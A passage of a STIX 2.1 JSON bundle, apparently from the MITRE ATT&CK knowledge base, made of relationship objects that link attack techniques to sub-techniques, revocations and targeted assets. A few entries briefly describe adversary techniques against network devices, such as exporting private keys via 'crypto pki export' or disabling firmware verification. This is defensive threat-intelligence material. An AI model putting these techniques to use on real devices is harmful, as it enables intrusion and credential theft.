"relationship", "spec_version": "2.1", "id": "relationship--1c8ce5e2-3a80-407e-9624-3619528df5fa", "created": "2020-03-15T16:16:25.878Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1ca95660-87c1-42f9-bb5d-7435f7999c88", "created": "2020-01-30T19:59:18.946Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", "target_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1cf89a8b-c0f6-4ffb-ae39-36e2a9d3b081", "created": "2023-09-29T18:46:12.052Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:46:12.052Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1d6fa472-a1fe-4657-a60d-c7f1c39b1653", "created": "2023-09-29T17:40:22.705Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:40:22.705Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1d79747d-3ff5-44ab-ae40-80823347c7d7", "created": "2020-01-14T17:21:54.547Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e3c5355-283f-4d8f-900d-c8fa86174d7c", "created": "2024-05-22T17:13:37.995Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:17:01.403Z", "description": "Asset Mapping Rationale: Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.\n", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e950346-c2b5-4b79-a2a0-d0b1ed1a221b", "created": "2022-09-27T18:02:16.150Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-27T18:02:16.150Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1eb067c7-e741-46b6-9080-dbc8395f8c43", "created": "2020-02-04T19:24:28.255Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "target_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f262330-4075-4fce-91b7-c3f0fd7a0739", "created": "2020-10-20T00:08:21.787Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f393d04-36db-4bae-a2a4-53ff12a1240e", "created": "2023-09-28T21:12:25.345Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:12:25.345Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1fd49958-9695-4137-9aaa-57fde4b97cc8", "created": "2023-09-29T17:09:59.595Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:59.595Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1fd5badc-0e9f-462c-9738-550e7e8d8ae3", "created": "2023-09-28T19:54:37.802Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:54:37.802Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--205f2226-9434-4703-bdab-8d09c06471b1", "created": "2024-05-22T17:24:04.040Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:22:12.966Z", "description": "Asset Mapping Rationale: Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. On network devices, private keys may be exported via Network Device CLI commands such as crypto pki export", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2067eae0-bab7-4737-a5ad-9c4c439d6a2c", "created": "2020-01-31T18:59:38.510Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", "target_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--206ded49-56fc-4c86-ab43-f4d45f5c343c", "created": "2020-02-18T18:23:31.836Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", "target_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--208fe57b-cf2e-4188-8a6f-77597cd60351", "created": "2023-09-29T17:44:43.317Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:44:43.317Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--20c01d16-fdd8-4f6b-ba0c-d81b70329440", "created": "2020-03-09T14:07:54.891Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21058f32-3d6e-4381-9288-5c2248e84cce", "created": "2023-09-29T18:44:27.240Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:44:27.240Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21103c84-cbf8-48ee-b02f-edd13157bd89", "created": "2020-10-01T02:17:46.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2138f4ee-5111-4469-92bb-1fc82a6822b4", "created": "2023-09-28T19:44:53.873Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:44:53.873Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21470001-67f2-47cf-af21-784e5024ac1d", "created": "2023-09-29T18:01:22.023Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:01:22.023Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2159458f-87fc-4479-81f4-a2521a378221", "created": "2023-09-28T21:22:09.790Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:22:09.790Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21638bb9-9a12-4dfc-b951-0b2e05bc2ca1", "created": "2024-05-21T17:21:49.747Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-21T17:43:19.067Z", "description": "Asset Mapping Rationale: Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique.", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--218c4556-40f6-421b-ad68-0bbe4d4e96ef", "created": "2024-05-22T17:19:53.356Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:25:49.518Z", "description": "Asset Mapping Rationale: Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext. ", "relationship_type": "targets", "source_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21aa6331-3419-4049-b180-8349b71e1f2a", "created": "2023-09-28T21:11:03.947Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:11:03.947Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21f9567c-18c5-41b2-9b57-bb2c039b5293", "created": "2020-01-24T17:35:47.843Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", "target_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22502e6f-8365-49ea-bb94-f46a98f2643b", "created": "2021-09-28T01:36:41.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22548926-29b4-4882-9878-633375489c0e", "created": "2023-09-28T20:30:50.842Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:30:50.842Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22653f82-bdac-463b-bdc0-ce971ad7b4df", "created": "2024-05-23T03:50:59.428Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T00:27:53.779Z", "description": "Asset Mapping Rationale: Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2289f005-7863-4af5-b681-cdfc03d3f111", "created": "2023-09-29T18:56:08.414Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T00:29:53.724Z", "description": "Asset Mapping Rationale: Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22ba5443-ea49-4076-a666-722eb5352f70", "created": "2023-09-28T20:02:45.697Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:02:45.697Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22c5d62b-40cd-4dce-9b6d-7836b67ee7f5", "created": "2020-01-24T15:06:36.002Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", "target_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22dd54d0-4285-444a-9bbd-ce3b3bd81b67", "created": "2020-09-30T17:09:31.964Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22e606f5-4130-4de8-984b-cfabcf5fc21c", "created": "2020-02-25T19:00:52.356Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", "target_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22e8b7b4-7e5f-45a8-a935-c4cc7da638f2", "created": "2020-02-11T18:29:47.836Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--232c7049-7609-46a9-8bbe-38672713f853", "created": "2023-09-28T21:15:32.371Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:15:32.371Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2346cbf5-b3c8-4110-a66c-6194251d4d49", "created": "2023-09-29T16:43:53.940Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:43:53.940Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23851bda-49de-4f35-979f-c4e6b5742389", "created": "2024-04-09T20:59:53.669Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:59:53.669Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, 